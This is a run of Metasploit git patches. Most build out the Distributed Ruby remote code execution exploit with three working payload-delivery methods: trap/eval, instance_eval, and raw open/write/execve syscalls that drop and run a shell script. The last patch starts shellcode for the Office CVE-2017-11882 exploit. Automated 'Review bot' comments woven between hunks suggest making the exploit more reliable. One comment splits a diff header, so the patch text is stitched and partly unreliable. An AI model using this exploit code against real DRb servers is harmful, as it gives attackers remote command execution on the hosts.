 if opts[:payload_uuid]
 s.payload_uuid = opts[:payload_uuid]
- if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid])
+ if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[session.payload_uuid.puid_hex])
 s.payload_uuid.registered = true
 s.payload_uuid.name = uuid_info['name']
 s.payload_uuid.timestamp = uuid_info['timestamp']
From ec2b5d48a652f0758aaf338d88721118eb12555a Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Wed, 15 Nov 2017 20:54:28 -0600
Subject: [PATCH 224/254] add missing payload uuid accessors
---
 lib/msf/core/payload/uuid.rb | 8 ++++++++
 1 file changed, 8 insertions(+)
diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb
index 1a651242e3..f510c88469 100644
--- a/lib/msf/core/payload/uuid.rb
+++ b/lib/msf/core/payload/uuid.rb
@@ -254,6 +254,10 @@ class Msf::Payload::UUID
 self.xor1 = opts[:xor1]
 self.xor2 = opts[:xor2]
+ self.timestamp = nil
+ self.name = nil
+ self.registered = false
+
 if opts[:seed]
 self.puid = self.class.seed_to_puid(opts[:seed])
 end
@@ -367,6 +371,10 @@ class Msf::Payload::UUID
 self
 end
+ attr_accessor :registered
+ attr_accessor :timestamp
+ attr_accessor :name
+
 attr_reader :arch
 attr_reader :platform
From 70ec576d52f36eab29248bc93692742c5ef3c7a7 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Wed, 29 Nov 2017 11:53:56 -0600
Subject: [PATCH 225/254] use correct session variable
---
 lib/msf/core/handler.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb
index 96f3fe56b4..24d882aad1 100644
--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -224,7 +224,7 @@ protected
 # Pass along any associated payload uuid if specified
 if opts[:payload_uuid]
 s.payload_uuid = opts[:payload_uuid]
- if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[session.payload_uuid.puid_hex])
+ if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[s.payload_uuid.puid_hex])
 s.payload_uuid.registered = true
 s.payload_uuid.name = uuid_info['name']
 s.payload_uuid.timestamp = uuid_info['timestamp']
From 174d0d46de9749722a0ffabbababada27d047959 Mon Sep 17 00:00:00 2001
From: Metasploit
Date: Wed, 29 Nov 2017 10:45:55 -0800
Subject: [PATCH 226/254] Bump version of framework to 4.16.21
---
 Gemfile.lock | 8 ++++----
 lib/metasploit/framework/version.rb | 2 +-
 2 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 6a6c15923e..fdd9aed9fd 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.20) + metasploit-framework (4.16.21) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -249,7 +249,7 @@ GEM ffi rbnacl-libsodium (1.0.15.1) rbnacl (>= 3.0.1) - recog (2.1.16) + recog (2.1.17) nokogiri redcarpet (3.4.0) rex-arch (0.1.13) @@ -265,7 +265,7 @@ GEM metasm rex-arch rex-text - rex-exploitation (0.1.15) + rex-exploitation (0.1.16) jsobfu metasm rex-arch @@ -357,7 +357,7 @@ GEM activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - yard (0.9.11) + yard (0.9.12) PLATFORMS ruby
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 7e90de291c..9ae49f17d5 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.20" + VERSION = "4.16.21" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From edb2d8b762971bdf5e4e11fa9f3def71e152197f Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 29 Nov 2017 17:01:01 -0600 Subject: [PATCH 227/254] fix windows unicode usernames, add recursive directory delete --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index fdd9aed9fd..a507211199 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.17) + metasploit-payloads (= 1.3.18) metasploit_data_models metasploit_payloads-mettle (= 0.2.8) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.17) + metasploit-payloads (1.3.18) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index cb469296e6..177deef087 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.17' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.18' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components From e5a5d35ad8cb12b0b1238d6b662380f348b9b5bb Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Wed, 29 Nov 2017 18:17:30 -0600 Subject: [PATCH 228/254] add 'promptname' that expands the module path a bit more This allows the user to actually see the module context. --- lib/msf/core/module/full_name.rb | 18 +++++++++++++++--- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- .../ui/console/command_dispatcher/modules.rb | 2 +- 3 files changed, 17 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/full_name.rb b/lib/msf/core/module/full_name.rb index c1b2d5b755..a6162299ea 100644 --- a/lib/msf/core/module/full_name.rb +++ b/lib/msf/core/module/full_name.rb @@ -24,6 +24,11 @@ module Msf::Module::FullName type + '/' + refname end + def promptname + elements = refname.split('/') + "#{elements[-2]}/#{elements[-1]}" + end + def shortname refname.split('/').last end @@ -55,9 +60,16 @@ module Msf::Module::FullName end # - # Returns the module's framework short name. This is a - # possibly conflicting name used for things like console - # prompts. + # Returns the module's framework prompt-friendly name. + # + # reverse_tcp + # + def promptname + self.class.promptname + end + + # + # Returns the module's framework short name. # # reverse_tcp # diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 78a8443412..85cd12da4a 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1107,7 +1107,7 @@ class Core if active_module # intentionally += and not << because we don't want to modify # datastore or the constant DefaultPrompt - prompt += " #{active_module.type}(%bld%red#{active_module.shortname}%clr)" + prompt += " #{active_module.type}(%bld%red#{active_module.promptname}%clr)" end prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar driver.update_prompt("#{prompt} ", prompt_char, true) 
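Review bot: The doc comment above the instance-level `promptname` in full_name.rb keeps the `reverse_tcp` example copied from `shortname`, but `promptname` returns the last two path elements joined by `/`, so the example no longer shows what the method yields; change the example line to something like `#   meterpreter/reverse_tcp` (constructed example). The class-level `promptname` in the first hunk has no comment at all, while its neighbours do; `# Last two elements of the refname, used for console prompts.` would match. Also, `elements[-2]` is nil for a refname without a `/`, which yields a leading slash; `refname.split('/').last(2).join('/')` handles that case without a branch.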
diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index bbb1993c29..6238599397 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -661,7 +661,7 @@ module Msf # Update the command prompt prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar - driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true) + driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.promptname}%clr) ", prompt_char, true) end # From c848379ecbcd259190e7b6e8891573b6dc73664b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 29 Nov 2017 20:52:14 -0600 Subject: [PATCH 229/254] simply use refname in the prompt? --- lib/msf/core/module/full_name.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/module/full_name.rb b/lib/msf/core/module/full_name.rb index a6162299ea..ecc6f3852b 100644 --- a/lib/msf/core/module/full_name.rb +++ b/lib/msf/core/module/full_name.rb @@ -25,8 +25,7 @@ module Msf::Module::FullName end def promptname - elements = refname.split('/') - "#{elements[-2]}/#{elements[-1]}" + refname end def shortname From 59580195b441a459692e265b8d18c3c0b9e2410b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 05:46:03 -0600 Subject: [PATCH 230/254] resurrect old methods, try all 3 --- .../linux/misc/drb_remote_codeexec.rb | 74 ++++++++++++++++--- 1 file changed, 62 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index b4c8577fef..f58d96c9e2 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb 
@@ -8,6 +8,8 @@ require 'drb/drb'
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
+ include Msf::Exploit::FileDropper
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Distributed Ruby Remote Code Execution',
@@ -43,26 +45,74 @@ class MetasploitModule < Msf::Exploit::Remote
 ])
 end
+ def method_trap(p)
+ p.send(:trap, 23,
+ :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+ p.send(:my_eval, payload.encoded)
+ end
+
+ def method_instance_eval(p)
+ p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
+ end
+
+ def method_syscall(p)
+ filename = "." + Rex::Text.rand_text_alphanumeric(16)
+
+ begin
+ # syscall to decide wether it's 64 or 32 bit:
+ # it's getpid on 32bit which will succeed, and writev on 64bit
+ # which will fail due to missing args
+ j = p.send(:syscall, 20)
+ # syscall open
+ i = p.send(:syscall, 8, filename, 0700)
+ # syscall write
+ p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+ # syscall close
+ p.send(:syscall, 6, i)
+ # syscall fork
+ p.send(:syscall, 2)
+ # syscall execve
+ p.send(:syscall, 11, filename, 0, 0)
+
+ # likely 64bit system
+ rescue Errno::EBADF
+ # syscall creat
+ i = p.send(:syscall,85,filename,0700)
+ # syscall write
+ p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+ # syscall close
+ p.send(:syscall,3,i)
+ # syscall fork
+ p.send(:syscall,57)
+ # syscall execve
+ p.send(:syscall,59,filename,0,0)
+ end
+
+ register_file_for_cleanup(filename) if filename
+ #print_status("payload executed from file #(unknown)") unless filename.nil?
+ #print_status("make sure to remove that file") unless filename.nil?
+ end
+
 def exploit
 serveruri = datastore['URI']
+ DRb.start_service
 p = DRbObject.new_with_uri(serveruri)
 class << p
 undef :send
 end
- p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
- # syscall to decide whether it's 64 or 32 bit:
- # it's getpid on 32bit which will succeed, and writev on 64bit
- # which will fail due to missing args
- begin
- pid = p.send(:syscall, 20)
- p.send(:syscall, 37, pid, 23)
- rescue Errno::EBADF
- # 64 bit system
- pid = p.send(:syscall, 39)
- p.send(:syscall, 62, pid, 23)
+ methods = ["instance_eval", "syscall", "trap"]
+ methods.each do |method|
+ begin
+ print_status("trying to exploit #{method}")
+ send("method_" + method, p)
+ handler(nil)
+ break
+ rescue SecurityError => e
+ print_error("target is not vulnerable to #{method}")
+ end
 end
- p.send(:my_eval, payload.encoded)
+
 end
 end
From 5da34e8f2bf0b14449ff46ba13a0bd0b67242c4b Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 06:36:42 -0600
Subject: [PATCH 231/254] support RHOST/RPORT
---
 modules/exploits/linux/misc/drb_remote_codeexec.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index f58d96c9e2..b42bfb6eb7 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -41,7 +41,10 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options(
 [
- OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
+ OptString.new('URI',
+ "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)"),
+ Opt::RHOST(nil, false),
+ Opt::RPORT(8787)
 ])
 end
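Review bot: `method_syscall` assigns `j = p.send(:syscall, 20)` and never reads `j`; the call is only a probe, so drop the binding and let the comment carry the meaning. `register_file_for_cleanup(filename) if filename` guards a value that is always a non-empty string, and the two commented-out `print_status` lines below it are dead code; remove all three qualifiers. In `exploit`, `rescue SecurityError => e` binds `e` without using it, and `break` fires whenever the call returns without raising, which is not evidence that the payload ran; `break if session_created?` would stop the loop on the outcome that matters. The `+ 10` in both write calls is the length of `"#!/bin/sh\n"`; building `script = "#!/bin/sh\n" << payload.encoded` once and passing `script.length` removes the magic number.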
@@ -94,7 +97,11 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def exploit
- serveruri = datastore['URI']
+ unless datastore['URI'].blank?
+ serveruri = datastore['URI']
+ else
+ serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
+ end
 DRb.start_service
 p = DRbObject.new_with_uri(serveruri)
From 9f12b794da2c633377c3a15306b3547d374cca64 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 06:37:04 -0600
Subject: [PATCH 232/254] cleanup comments
---
 .../exploits/linux/misc/drb_remote_codeexec.rb | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index b42bfb6eb7..b0c1385c51 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -62,9 +62,9 @@ class MetasploitModule < Msf::Exploit::Remote
 filename = "." + Rex::Text.rand_text_alphanumeric(16)
 begin
- # syscall to decide wether it's 64 or 32 bit:
- # it's getpid on 32bit which will succeed, and writev on 64bit
- # which will fail due to missing args
+ # Decide if this is running on an x86 or x64 target.
+ # This syscall number is getpid on x86, which will succeed,
+ # or writev on x64, which will fail due to missing args.
 j = p.send(:syscall, 20)
 # syscall open
 i = p.send(:syscall, 8, filename, 0700)
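Review bot: The new `unless datastore['URI'].blank? ... else ... end` in `exploit` is the unless/else form the Ruby style guide flags; a single conditional assignment reads more directly, `serveruri = datastore['URI'].blank? ? "druby://#{datastore['RHOST']}:#{datastore['RPORT']}" : datastore['URI']`. With RHOST made optional in the register_options hunk above, both values can be blank and the fallback then silently builds `druby://:8787`; the failure surfaces as a connection error rather than a configuration message, so a blank check before this line would name the real cause. The rest of `exploit` continues outside the hunk.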
@@ -77,18 +77,18 @@ class MetasploitModule < Msf::Exploit::Remote
 # syscall execve
 p.send(:syscall, 11, filename, 0, 0)
- # likely 64bit system
+ # likely x64
 rescue Errno::EBADF
 # syscall creat
- i = p.send(:syscall,85,filename,0700)
+ i = p.send(:syscall, 85, filename, 0700)
 # syscall write
- p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+ p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
 # syscall close
- p.send(:syscall,3,i)
+ p.send(:syscall, 3, i)
 # syscall fork
- p.send(:syscall,57)
+ p.send(:syscall, 57)
 # syscall execve
- p.send(:syscall,59,filename,0,0)
+ p.send(:syscall, 59, filename, 0, 0)
 end
 register_file_for_cleanup(filename) if filename
From eea72663b35cc1e1dfe0dd3372cb091c5603c248 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 06:37:21 -0600
Subject: [PATCH 233/254] warn on method failure instead of error
---
 modules/exploits/linux/misc/drb_remote_codeexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index b0c1385c51..aa82cb320b 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
 handler(nil)
 break
 rescue SecurityError => e
- print_error("target is not vulnerable to #{method}")
+ print_warning("target is not vulnerable to #{method}")
 end
 end
From a0e0e1db15fd4b7d6abd5471c9f88d76fb0fd235 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 07:51:12 -0600
Subject: [PATCH 234/254] allow manual targeting, handle errors better
---
 .../exploits/linux/misc/drb_remote_codeexec.rb | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index aa82cb320b..dc805981e2 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -33,7 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
 'Targets' => [
- ['Automatic', {}],
+ ['Automatic', { method: 'auto'}],
+ ['Trap', { method: 'trap'}],
+ ['Eval', { method: 'instance_eval'}],
+ ['Syscall', { method: 'syscall'}],
 ],
 'DisclosureDate' => 'Mar 23 2011',
 'DefaultTarget' => 0))
@@ -76,6 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
 p.send(:syscall, 2)
 # syscall execve
 p.send(:syscall, 11, filename, 0, 0)
+ print_status("attempting x86 execve of #(unknown)")
 # likely x64
 rescue Errno::EBADF
@@ -89,6 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 p.send(:syscall, 57)
 # syscall execve
 p.send(:syscall, 59, filename, 0, 0)
+ print_status("attempting x64 execve of #(unknown)")
 end
 register_file_for_cleanup(filename) if filename
@@ -109,14 +114,19 @@ class MetasploitModule < Msf::Exploit::Remote
 undef :send
 end
- methods = ["instance_eval", "syscall", "trap"]
+ if target[:method] == 'auto'
+ methods = ["instance_eval", "syscall", "trap"]
+ else
+ methods = [target[:method]]
+ end
+
 methods.each do |method|
 begin
 print_status("trying to exploit #{method}")
 send("method_" + method, p)
 handler(nil)
 break
- rescue SecurityError => e
+ rescue SecurityError, DRb::DRbConnError, NoMethodError
 print_warning("target is not vulnerable to #{method}")
 end
 end
From 87e683c7634f0bb7018ae1a72dcd7214f918d70b Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 08:12:15 -0600
Subject: [PATCH 235/254] add back kill syscall for trap method
---
 modules/exploits/linux/misc/drb_remote_codeexec.rb | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index dc805981e2..ca6b34f4c3 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
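Review bot: The `print_status("attempting x86 execve of ...")` line in the `@@ -76` hunk is placed after `p.send(:syscall, 11, filename, 0, 0)`, so it is only printed once execve has already returned (or never, if that call raises); the message should precede the syscall it announces, and the same applies to the x64 line in the `@@ -89` hunk. As written the operator sees "attempting" after the fact and gets no output at all on the failure path, which is exactly when the status would help. The enclosing `method_syscall` starts and ends outside these hunks.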
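Review bot: `rescue SecurityError, DRb::DRbConnError, NoMethodError` in the `@@ -109` hunk reports a dropped connection, and any `NoMethodError` raised by this module's own `method_*` code, as "target is not vulnerable to #{method}", which misattributes the failure and keeps iterating over a host that is no longer reachable. Catch `DRb::DRbConnError` in its own clause and stop with `fail_with(Failure::Unreachable, "connection to #{serveruri} lost")`, and keep `NoMethodError` only if it is confirmed to be what the remote side raises for a refused method rather than a local typo. The `if target[:method] == 'auto' ... else` block would read as a single expression: `methods = target[:method] == 'auto' ? ["instance_eval", "syscall", "trap"] : [target[:method]]`.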
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
 'DisclosureDate' => 'Mar 23 2011',
 'DefaultTarget' => 0))
-
 register_options(
 [
 OptString.new('URI',
@@ -54,6 +53,15 @@ class MetasploitModule < Msf::Exploit::Remote
 def method_trap(p)
 p.send(:trap, 23,
 :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+ # Decide if this is running on an x86 or x64 target, using the kill(2) syscall
+ begin
+ pid = p.send(:syscall, 20)
+ p.send(:syscall, 37, pid, 23)
+ rescue Errno::EBADF
+ # 64 bit system
+ pid = p.send(:syscall, 39)
+ p.send(:syscall, 62, pid, 23)
+ end
 p.send(:my_eval, payload.encoded)
 end
From d689b33d7edc6baddb5280bffa48e04caad2b764 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 08:31:13 -0600
Subject: [PATCH 236/254] more error handling, deal with user error
---
 .../exploits/linux/misc/drb_remote_codeexec.rb | 17 +++++++++++++----
 1 file changed, 13 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index ca6b34f4c3..5c7515cef3 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -43,8 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options(
 [
- OptString.new('URI',
- "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)"),
+ OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]),
 Opt::RHOST(nil, false),
 Opt::RPORT(8787)
 ])
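Review bot: The getpid-then-`Errno::EBADF` probe added to `method_trap` in the `@@ -54` hunk duplicates the one already in `method_syscall` (outside this hunk), so the architecture heuristic now lives in two places that can drift; a private helper such as `x64_target?(p)` that returns true on `Errno::EBADF` would let both methods share it and keep the paired syscall numbers in one table. The comment `# Decide if this is running on an x86 or x64 target, using the kill(2) syscall` also understates what the block does — the kill with signal 23 is what fires the handler installed by the `trap` call above it; `# Probe the arch via getpid/writev, then raise signal 23 so the trap handler defined above runs` says both. The `# 64 bit system` comment inside the rescue would read consistently with the rest of the file as `# likely x64`.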
@@ -110,6 +109,16 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def exploit
+ if !datastore['URI'].blank? && !datastore['RHOST'].blank?
+ print_error("URI and RHOST are specified, unset one")
+ return
+ end
+
+ if datastore['URI'].blank? && datastore['RHOST'].blank?
+ print_error("neither URI nor RHOST are specified, set one")
+ return
+ end
+
 unless datastore['URI'].blank?
 serveruri = datastore['URI']
 else
@@ -130,12 +139,12 @@ class MetasploitModule < Msf::Exploit::Remote
 methods.each do |method|
 begin
- print_status("trying to exploit #{method}")
+ print_status("Trying to exploit #{method} method")
 send("method_" + method, p)
 handler(nil)
 break
 rescue SecurityError, DRb::DRbConnError, NoMethodError
- print_warning("target is not vulnerable to #{method}")
+ print_warning("Target is not vulnerable to #{method} method")
 end
 end
From c288dab338424237d364ac1cb9bfc28f8e0d3dad Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 10:51:02 -0600
Subject: [PATCH 237/254] fixup RHOST/RPORT expectations if only URI is set
---
 modules/exploits/linux/misc/drb_remote_codeexec.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
index 5c7515cef3..8eedfe4403 100644
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -104,8 +104,6 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 register_file_for_cleanup(filename) if filename
- #print_status("payload executed from file #(unknown)") unless filename.nil?
- #print_status("make sure to remove that file") unless filename.nil?
 end
 def exploit
@@ -121,6 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
 unless datastore['URI'].blank?
 serveruri = datastore['URI']
+ (datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':')
 else
 serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
 end
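Review bot: The two new guards at the top of `exploit` report the misconfiguration with `print_error` and a bare `return`, so from the framework's point of view the run completed normally; `fail_with(Failure::BadConfig, 'URI and RHOST are both set, unset one')` (and the same for the neither-set case) turns it into an explicit module failure that scripted runs and the console can detect. The hunk ends at the `else`, and `exploit` continues past it.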
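Review bot: `(datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':')` stores RPORT as a String (or `nil` when the URI carries no port) and mis-splits any host that itself contains a colon, such as a bracketed IPv6 literal. Parsing with the standard library is more robust: `uri = URI.parse(serveruri)` / `datastore['RHOST'] = uri.host` / `datastore['RPORT'] = uri.port`, which yields an Integer port and rejects malformed input with `URI::InvalidURIError` instead of silently producing a bad pair. The enclosing `exploit` starts before this hunk and continues after it.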
From 09dd5b84890488e912144ecedeb0597d6d72eafd Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 30 Nov 2017 10:51:21 -0600
Subject: [PATCH 238/254] fix check command to not require an rport _method_
---
 lib/msf/ui/console/module_command_dispatcher.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb
index 7f378440cc..7064ce6e83 100644
--- a/lib/msf/ui/console/module_command_dispatcher.rb
+++ b/lib/msf/ui/console/module_command_dispatcher.rb
@@ -209,10 +209,10 @@ module ModuleCommandDispatcher
 end
 rhost = instance.datastore['RHOST']
- rport = nil
+ rport = instance.datastore['RPORT']
 peer = rhost
- if instance.datastore['rport']
- rport = instance.rport
+ if rport
+ rport = instance.rport if instance.respond_to?(:rport)
 peer = "#{rhost}:#{rport}"
 end
From 7df46b33e88af63b98844eb4bceba16e40507c2b Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Fri, 1 Dec 2017 08:03:56 -0500
Subject: [PATCH 239/254] disassembly ASM
---
 .../windows/fileformat/office_ms17_11882.rb | 49 +++++++++++++++----
 1 file changed, 40 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 37f096f7ac..6aafc49c14 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -22,18 +22,17 @@ class MetasploitModule < Msf::Exploit::Remote
 a length of 109 bytes to be executed Affects Microsoft Office word for the latest
 17 years.
 },
- 'Author' => ['mumbai', 'embedi', 'BlackMathIT'],
+ 'Author' => ['mumbai', 'embedi'],
 'License' => MSF_LICENSE,
 'DisclosureDate' => 'Nov 15 2017',
 'References' => [
 ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
- ['URL', 'https://github.com/embedi/CVE-2017-11882'],
- ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py']
+ ['URL', 'https://github.com/embedi/CVE-2017-11882']
 ],
 'Platform' => 'win',
 'Arch' => [ARCH_X86, ARCH_X64],
 'Targets' => [
- ['Microsoft Office Word', {} ],
+ ['Microsoft Office', {} ],
 ],
 'DefaultTarget' => 0,
 'Payload' => {
@@ -131,11 +130,43 @@ class MetasploitModule < Msf::Exploit::Remote
 header << "000000000000000000000000000000000000000000000000000000000000000\n"
- shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
- shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
- shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09"
- shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53"
- shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90"
+ shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
+ shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax]
+ shellcode << "\x9e" # 6: 9e sahf
+ shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
